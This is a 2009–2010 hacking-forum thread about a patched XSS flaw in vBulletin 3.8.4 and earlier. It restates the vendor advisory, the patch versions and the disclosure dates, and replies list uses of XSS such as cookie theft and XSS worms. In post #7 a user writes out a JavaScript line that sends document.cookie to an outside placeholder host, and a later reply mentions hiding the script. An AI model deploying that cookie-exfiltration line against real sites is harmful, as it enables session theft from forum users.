| Exploits, Vulnerabilities & PoCs Got information about the above? |
#1
| ||||
| ||||
| vBulletin 3.8.4 - Cross Site Script Redirection vBulletin - Cross Site Script Redirection Versions Affected: 3.8.4 / 3.7.6 / 3.6.12 Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1 Info: An XSS flaw within the user profile page has recently been discovered. This could allow an attacker to carry out an action as a user or obtain access to a user's account. To resolve this issue, it has been necessary to release a patch level version of the active versions of vBulletin. The upgrade process is the same as previous patch level releases - simply download the patch from the Members Area, extract the files and upload to your webserver, overwriting the existing files. There is no upgrade script required. As with all security-based releases, we recommend that all customers upgrade as soon as possible in order to prevent any potential damage resulting from the flaw being exploited. Credits: The original finder of the security hole. (Jelsoft?) Researched & Disclosed by: MaXe (InterN0T.net) References: http://www.vbulletin.com/forum/showthread.php?t=319572 The Advisory Quote:
Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1 Conclusion vBulletin is generally a safe and secure platform to use for large forums. This security hole / exploit is implausible to actually work against people. Please see: http://forum.intern0t.net/blogs/maxe...scripting.html for more information! Disclosure Information: - Unknown date of when the vendor found the security hole. - Vendor released patch on the 7th October 2009. - Security hole researched and disclosed on 8th October 2009. All of the best, MaXe
__________________ ![]() Quote:
|
|
#2
| ||||
| ||||
| Re: vBulletin 3.8.4 - Cross Site Script Redirection
O_O shweet find! lol /pwn going around everywhere
__________________ "BackTrack is the fastest way to go from boot to remote root." - H.D. Moore ![]() |
|
#3
| ||||
| ||||
| Re: vBulletin 3.8.4 - Cross Site Script Redirection
so ? how to hack vbulletin?? :D
__________________ -= newbie permanent was here =- visit my blog @ http://zerofreedom.wordpress.com |
|
#4
| ||||
| ||||
| Re: vBulletin 3.8.4 - Cross Site Script Redirection
Read the post. The version of vBulleting is vulnerable to XSS. Read up on XSS. ;) |
|
#5
| ||||
| ||||
| Re: vBulletin 3.8.4 - Cross Site Script Redirection
what we can do with XSS ? just cookie stealer or else?
__________________ -= newbie permanent was here =- visit my blog @ http://zerofreedom.wordpress.com |
|
#6
| |||
| |||
| Re: vBulletin 3.8.4 - Cross Site Script Redirection
cookie stealing and sesson hijacking are the most dangerous one ! but there are more ! like coding xss worm , or making ddos by persistance xss ! also there are some powerfull tools like BeEF . google it ;)
__________________ I love InterN0T |
|
#7
| |||
| |||
| Re: vBulletin 3.8.4 - Cross Site Script Redirection
I was checking this bug and even if we use a js file with a code like window.location="http://yourpage.com/bob.php?q="+document.cookie; it will only send bblastvisit=value1; bblastactivity=value2 because bbsessionhash cookie is sent by vbulletin as HttpOnly. We can't access to it through clientside (tested with FF 3.6.4 and IE 6.0) |
|
#8
| ||||
| ||||
| Re: vBulletin 3.8.4 - Cross Site Script Redirection Quote:
![]() Thanks for the information though :)
__________________ ![]() Quote:
|
|
#9
| |||
| |||
| Re: vBulletin 3.8.4 - Cross Site Script Redirection Quote:
it also works in vBulletin® Version 3.7.5 |
|
#10
| |||
| |||
| Re: vBulletin 3.8.4 - Cross Site Script Redirection
Yes, a hint would be nice =) I have the same problem =/ EDIT: I found a solution :) Just need to hide the javascript somehow =/ Last edited by Watermagician; 19th May 2010 at 23:41. |
![]() |
| Bookmarks |
| Thread Tools | |
| Display Modes | |
| |
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Cross Site Scripting via POST-requests | MaXe | Web Hacking & War Games | 7 | 8th June 2010 16:37 |
| [Guide] Cross Site Scripting - Attack and Defense guide | hestas | Web Hacking & War Games | 6 | 26th March 2010 15:13 |
| FBI XSS / Cross Site Scripting Vulnerability | MaXe | Exploits, Vulnerabilities & PoCs | 2 | 28th January 2009 08:34 |